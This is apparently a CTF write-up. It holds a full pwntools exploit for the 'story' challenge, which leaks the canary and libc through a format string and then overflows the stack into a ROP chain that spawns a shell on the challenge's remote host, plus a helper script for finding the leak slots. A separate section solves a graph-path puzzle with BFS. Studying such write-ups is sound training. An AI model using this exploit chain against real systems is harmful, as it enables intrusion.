CTF competitions, January 03, 2020

Xihu Lunjian (西湖论剑) CTF: partial writeups


Pwn challenge: story

![image.png](https://upload-images.jianshu.io/upload_images/9085575-5c9429d71ed20cb7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

A quick look at the binary shows that every mitigation is enabled except address randomization (PIE is off, which is why the gadget address below can be hard-coded). Analysing the logic turns up two bugs: a format-string vulnerability, which lets us leak a real libc address and the stack canary, and a stack overflow. v1 is a 1024-byte buffer, and the copy made through strdup lets us overrun the stack; because the canary has already been leaked we simply write it back in its place on the way past, so the exploit is straightforward:

```python
# coding=utf8
from pwn import *

context.log_level = 'debug'
local = False
elf = ELF('./story')
if local:
    p = process('./story')
    libc = elf.libc
else:
    p = remote('ctf3.linkedbyx.com', 11055)
    # the remote libc turned out to be the same as the local one
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Stage 1: format-string leak of the canary (stack slot 15) and of the
# saved return address into __libc_start_main (slot 25)
p.recvuntil(b'Please Tell Your ID:')
# gdb.attach(p, 'b *0x00400977')
p.sendline(b'%15$p%25$p')
p.recvuntil(b'Hello ')
leak = p.recvline().strip()          # b'0x<canary>0x<__libc_start_main+240>'
canary, ret_addr = (int(x, 16) for x in leak.split(b'0x')[1:])
log.info(f'canary            = {canary:#x}')
# on this glibc (2.23) main returns to __libc_start_main+240
libc_start_main = ret_addr - 240
log.info(f'__libc_start_main = {libc_start_main:#x}')

# Stage 2: rebase libc and resolve system() and the "/bin/sh" string
libc.address = libc_start_main - libc.symbols['__libc_start_main']
system = libc.symbols['system']
binsh = next(libc.search(b'/bin/sh'))

# Stage 3: any size larger than 0x128 makes the copy overrun the stack buffer
p.recvuntil(b'Tell me the size of your story:')
p.sendline(b'1000')

# Stage 4: fill the buffer, put the leaked canary back in place, then ROP to system("/bin/sh")
pop_rdi = 0x400bd3                   # pop rdi ; ret  (binary is not PIE)
payload = b'a' * 0x88
payload += p64(canary)               # canary must be restored exactly
payload += b'a' * 8                  # saved rbp
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
p.recvuntil(b'You can speak your story:')
p.sendline(payload)
p.interactive()
```
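How the slot numbers 15 and 25 used above get found in the first place: send a numbered dump such as `%1$p.%2$p. ... %26$p.`, then pick out the canary (its low byte is always 0x00 and the rest is random, so it almost never looks like a pointer) and the return address into `__libc_start_main` (ASLR slides libc by whole pages, so the low 12 bits of that address never change and can be matched against the libc symbol table). The script below is an added example, not the author's code: the echoed line is constructed to look like the challenge's output, and the libc offsets are assumed values for libc6_2.23-0ubuntu10 amd64 that must be checked against the real libc before use.

```python
"""Locate the format-string slots holding the canary and the return address
into __libc_start_main, then rebase libc.  Added example, not the author's
code.  SAMPLE_DUMP is CONSTRUCTED, not a real capture; the libc offsets are
assumptions for libc6_2.23-0ubuntu10 (verify with `readelf -s` / pwntools)."""

# Constructed echo of 26 "%N$p." slots: slot 15 is shaped like a canary,
# slot 25 like __libc_start_main+240 with libc mapped at 0x7f1e2bf7e000.
SAMPLE_DUMP = (
    "Hello 0x7ffd1a2b3c40.0x7f1e2c3d4e50.(nil).0x400d90.0x1.0x7f1e2c0a8620."
    "0x7ffd1a2b3c80.(nil).0x400b60.0x7f1e2c3d3b20."
    "0x2432252e70243125.0x2e70243425702433.0x2e70243625702435.0x2e70243825702437."
    "0x9c4e7a1f3b2d6e00.0x7ffd1a2b3d10.0x400a60.0x7f1e2c3d4ab0.0x7ffd1a2b3d08."
    "(nil).0x1.0x7ffd1a2b3dd8.0x7ffd1a2b3dc8.0x400c20.0x7f1e2bf9e830.0x7ffd1a2b3dd8\n"
)

# Assumed offsets (libc6_2.23-0ubuntu10, x86-64); check them against your libc.
LIBC_START_MAIN_OFF = 0x20740
SYSTEM_OFF = 0x45390
BINSH_OFF = 0x18cd57
MAIN_RET_OFF = 240            # main returns to __libc_start_main+240 on this glibc
USERSPACE_TOP = 1 << 47       # x86-64 user-space pointers are below 0x800000000000


def parse_dump(line, prefix="Hello "):
    """Map slot number -> leaked value; printf prints a NULL pointer as '(nil)'."""
    body = line.split(prefix, 1)[1].strip()
    slots = {}
    for n, tok in enumerate(body.split("."), start=1):
        if tok:                                   # skip the empty token after the last '.'
            slots[n] = 0 if tok == "(nil)" else int(tok, 16)
    return slots


def canary_slots(slots):
    """glibc's x86-64 canary has a 0x00 low byte (so string functions stop on it)
    and 56 random bits, so it is almost never inside the user-space pointer range."""
    return [n for n, v in sorted(slots.items())
            if v and v & 0xff == 0 and v >= USERSPACE_TOP]


def libc_return_slots(slots, symbol_off, ret_off=MAIN_RET_OFF):
    """ASLR keeps libc page-aligned, so the low 12 bits of __libc_start_main+ret_off
    are invariant: match on them instead of guessing which 0x7f... value is right."""
    want = (symbol_off + ret_off) & 0xfff
    return [n for n, v in sorted(slots.items())
            if 0x7f0000000000 <= v < USERSPACE_TOP and v & 0xfff == want]


def resolve(slots, start_main_off=LIBC_START_MAIN_OFF,
            system_off=SYSTEM_OFF, binsh_off=BINSH_OFF):
    """Pick the two slots, rebase libc and resolve the addresses the ROP chain needs.
    Refuses ambiguous dumps rather than silently picking the first candidate."""
    c = canary_slots(slots)
    r = libc_return_slots(slots, start_main_off)
    if len(c) != 1 or len(r) != 1:
        raise ValueError(f"ambiguous leak: canary slots {c}, libc slots {r}")
    base = slots[r[0]] - MAIN_RET_OFF - start_main_off
    assert base & 0xfff == 0, "libc base is not page aligned: wrong offset or wrong libc"
    return {
        "canary_slot": c[0], "ret_slot": r[0],
        "canary": slots[c[0]], "libc_base": base,
        "system": base + system_off, "binsh": base + binsh_off,
    }


if __name__ == "__main__":
    info = resolve(parse_dump(SAMPLE_DUMP))
    print({k: hex(v) for k, v in info.items()})
```

Against a live target the same functions run over the real echoed line; when more than one slot matches, dump more slots or check the candidates in gdb instead of guessing.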

That solves this challenge. I could not solve the remaining two heap challenges; I will reproduce them later.

Misc challenge

```python
# The veteran homebody "flag{" went to a party at a friend's invitation.
# There he saw the beautiful "75D}", was instantly smitten, and became convinced
# that the two of them were made for each other.
# He wants to get to know her through friends of friends, but is too shy to make a fuss.
# Luckily a friend got hold of a relationship graph of the party guests, as follows:

[('FloraPrice','E11'),('FloraPrice','E9'),('FloraPrice','75D}'),
 ('NoraFayette','E11'),('NoraFayette','E10'),('NoraFayette','E13'),('NoraFayette','E12'),
 ('NoraFayette','E14'),('NoraFayette','E9'),('NoraFayette','E7'),('NoraFayette','E6'),
 ('E10','SylviaAvondale'),('E10','MyraLiddel'),('E10','HelenLloyd'),('E10','KatherinaRogers'),
 ('VerneSanderson','E7'),('VerneSanderson','E12'),('VerneSanderson','E9'),('VerneSanderson','E8'),
 ('E12','HelenLloyd'),('E12','KatherinaRogers'),('E12','SylviaAvondale'),('E12','MyraLiddel'),
 ('E14','SylviaAvondale'),('E14','75D}'),('E14','KatherinaRogers'),
 ('FrancesAnderson','E5'),('FrancesAnderson','E6'),('FrancesAnderson','E8'),('FrancesAnderson','E3'),
 ('DorothyMurchison','E9'),('DorothyMurchison','E8'),
 ('EvelynJefferson','E9'),('EvelynJefferson','E8'),('EvelynJefferson','E5'),('EvelynJefferson','E4'),
 ('EvelynJefferson','E6'),('EvelynJefferson','E1'),('EvelynJefferson','E3'),('EvelynJefferson','E2'),
 ('RuthDeSand','E5'),('RuthDeSand','E7'),('RuthDeSand','E9'),('RuthDeSand','E8'),
 ('HelenLloyd','E11'),('HelenLloyd','E7'),('HelenLloyd','E8'),
 ('OliviaCarleton','E11'),('OliviaCarleton','E9'),
 ('EleanorNye','E5'),('EleanorNye','E7'),('EleanorNye','E6'),('EleanorNye','E8'),
 ('E9','TheresaAnderson'),('E9','PearlOglethorpe'),('E9','KatherinaRogers'),('E9','SylviaAvondale'),('E9','MyraLiddel'),
 ('E8','TheresaAnderson'),('E8','PearlOglethorpe'),('E8','KatherinaRogers'),('E8','SylviaAvondale'),
 ('E8','BrendaRogers'),('E8','LauraMandeville'),('E8','MyraLiddel'),
 ('E5','TheresaAnderson'),('E5','BrendaRogers'),('E5','LauraMandeville'),('E5','CharlotteMcDowd'),
 ('E4','CharlotteMcDowd'),('E4','TheresaAnderson'),('E4','BrendaRogers'),
 ('E7','TheresaAnderson'),('E7','SylviaAvondale'),('E7','BrendaRogers'),('E7','LauraMandeville'),('E7','CharlotteMcDowd'),
 ('E6','TheresaAnderson'),('E6','PearlOglethorpe'),('E6','BrendaRogers'),('E6','LauraMandeville'),
 ('E1','LauraMandeville'),('E1','BrendaRogers'),
 ('E3','TheresaAnderson'),('E3','BrendaRogers'),('E3','LauraMandeville'),('E3','CharlotteMcDowd'),('E3','flag{'),
 ('E2','LauraMandeville'),('E2','TheresaAnderson'),
 ('KatherinaRogers','E13'),('E13','SylviaAvondale')]

# Can you help Mr. flag{ get in touch with Ms. 75D} while letting as few people as possible know?
# Find the shortest path from node "flag{" to node "75D}"; that path is the flag,
# e.g. flag{E3AliceBobXXXXXXXXXXXXXXXX75D}
```

This is a graph problem: find the shortest path between two nodes. We already know the flag starts with flag{E3 and ends with 75D}, so we can search from both ends. From the front, "flag{" is connected only to E3, so list E3's neighbours; from the back, "75D}" is connected to FloraPrice and E14, and FloraPrice is connected to E9, so list E9's neighbours and look for a node that appears in both lists. The shortest route found this way is five hops long. I am not good enough to write a script for this, so I worked it out on paper instead.


So the flag is flag{E3EvelynJeffersonE9FloraPrice75D}.
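The search done by hand above, written out as a script (an added example, not the author's code). The edge list is the challenge's own; the graph is undirected, so each edge is recorded in both directions. A breadth-first search from "flag{" that keeps every parent at minimum distance, followed by a walk back from "75D}", returns all shortest paths rather than the first one found, which matters here: on this graph there are two routes of the same length, through EvelynJefferson and through TheresaAnderson, and the author's flag is the first of them.

```python
"""All shortest paths between the two planted nodes of the party graph.
Added example, not the author's code; EDGES is the challenge's edge list."""
from collections import deque

EDGES = [
    ('FloraPrice','E11'),('FloraPrice','E9'),('FloraPrice','75D}'),
    ('NoraFayette','E11'),('NoraFayette','E10'),('NoraFayette','E13'),('NoraFayette','E12'),
    ('NoraFayette','E14'),('NoraFayette','E9'),('NoraFayette','E7'),('NoraFayette','E6'),
    ('E10','SylviaAvondale'),('E10','MyraLiddel'),('E10','HelenLloyd'),('E10','KatherinaRogers'),
    ('VerneSanderson','E7'),('VerneSanderson','E12'),('VerneSanderson','E9'),('VerneSanderson','E8'),
    ('E12','HelenLloyd'),('E12','KatherinaRogers'),('E12','SylviaAvondale'),('E12','MyraLiddel'),
    ('E14','SylviaAvondale'),('E14','75D}'),('E14','KatherinaRogers'),
    ('FrancesAnderson','E5'),('FrancesAnderson','E6'),('FrancesAnderson','E8'),('FrancesAnderson','E3'),
    ('DorothyMurchison','E9'),('DorothyMurchison','E8'),
    ('EvelynJefferson','E9'),('EvelynJefferson','E8'),('EvelynJefferson','E5'),('EvelynJefferson','E4'),
    ('EvelynJefferson','E6'),('EvelynJefferson','E1'),('EvelynJefferson','E3'),('EvelynJefferson','E2'),
    ('RuthDeSand','E5'),('RuthDeSand','E7'),('RuthDeSand','E9'),('RuthDeSand','E8'),
    ('HelenLloyd','E11'),('HelenLloyd','E7'),('HelenLloyd','E8'),
    ('OliviaCarleton','E11'),('OliviaCarleton','E9'),
    ('EleanorNye','E5'),('EleanorNye','E7'),('EleanorNye','E6'),('EleanorNye','E8'),
    ('E9','TheresaAnderson'),('E9','PearlOglethorpe'),('E9','KatherinaRogers'),('E9','SylviaAvondale'),('E9','MyraLiddel'),
    ('E8','TheresaAnderson'),('E8','PearlOglethorpe'),('E8','KatherinaRogers'),('E8','SylviaAvondale'),
    ('E8','BrendaRogers'),('E8','LauraMandeville'),('E8','MyraLiddel'),
    ('E5','TheresaAnderson'),('E5','BrendaRogers'),('E5','LauraMandeville'),('E5','CharlotteMcDowd'),
    ('E4','CharlotteMcDowd'),('E4','TheresaAnderson'),('E4','BrendaRogers'),
    ('E7','TheresaAnderson'),('E7','SylviaAvondale'),('E7','BrendaRogers'),('E7','LauraMandeville'),('E7','CharlotteMcDowd'),
    ('E6','TheresaAnderson'),('E6','PearlOglethorpe'),('E6','BrendaRogers'),('E6','LauraMandeville'),
    ('E1','LauraMandeville'),('E1','BrendaRogers'),
    ('E3','TheresaAnderson'),('E3','BrendaRogers'),('E3','LauraMandeville'),('E3','CharlotteMcDowd'),('E3','flag{'),
    ('E2','LauraMandeville'),('E2','TheresaAnderson'),
    ('KatherinaRogers','E13'),('E13','SylviaAvondale'),
]


def build_graph(edges):
    """Undirected adjacency sets: the tuples give no direction, so add both ways."""
    g = {}
    for a, b in edges:
        g.setdefault(a, set()).add(b)
        g.setdefault(b, set()).add(a)
    return g


def all_shortest_paths(g, src, dst):
    """BFS from src; a node keeps every neighbour that reaches it at its minimum
    distance as a parent, so walking back from dst enumerates all shortest paths."""
    dist, parents = {src: 0}, {src: []}
    queue = deque([src])
    while queue:
        u = queue.popleft()
        if u == dst:          # every node closer than dst has already been expanded
            break
        for v in g[u]:
            if v not in dist:
                dist[v] = dist[u] + 1
                parents[v] = [u]
                queue.append(v)
            elif dist[v] == dist[u] + 1:
                parents[v].append(u)
    if dst not in dist:
        return []

    def walk(node):
        if node == src:
            return [[src]]
        return [p + [node] for par in parents[node] for p in walk(par)]

    return sorted(walk(dst))


def candidate_flags(edges=EDGES, src='flag{', dst='75D}'):
    """Concatenate each shortest path into the flag format the challenge asks for."""
    return [''.join(p) for p in all_shortest_paths(build_graph(edges), src, dst)]


if __name__ == '__main__':
    for f in candidate_flags():
        print(f)
```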
